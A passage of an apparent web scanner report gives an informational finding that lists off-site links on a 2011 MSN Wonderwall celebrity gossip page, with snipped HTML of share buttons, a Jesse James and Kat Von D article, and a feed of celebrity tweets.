<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.369. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:51 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45347_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45347_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45347_Original.jpg" alt="By Drew MackieYou know how it's awkward to see couples getting all handsy and kissy in public? Thanks to Jesse James and Kat Von D, this uncomfortable situation has been reproduced on Twitter. Yes, it's e-PDA, with all the gooey, sloppy show-offiness of a shameless couple in heat but delivered to your computers and phones. Click through to follow the exchange, but pace yourself: The out-of-character syrupy sweetness may overwhelm even the hardiest of constitutions.@FreeJesseJames: Done, off to the paint shop in the morning. @TheKatVonD: just so you know, you're impressing the hell outta me...Subtext: Kat Von D is easily impressed, given that going to various auto shop locations is part of Jesse James's daily work. Then again, look who she's dating. Her standards for impressive are clearly low.RELATED: See if Kat's blue dye job is a Hairdo or Hair Don't" /></span>
...[SNIP]...
<P ALIGN="LEFT">You know how it's awkward to see couples getting all handsy and kissy in public? Thanks to <A HREF="http://twitter.com/freejessejames" TARGET="_blank">Jesse James</A> and <A HREF="http://twitter.com/thekatvond" TARGET="_blank">Kat Von D</A>
...[SNIP]...
<b>@<A HREF="http://twitter.com/thekatvond" TARGET="_blank">TheKatVonD:</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
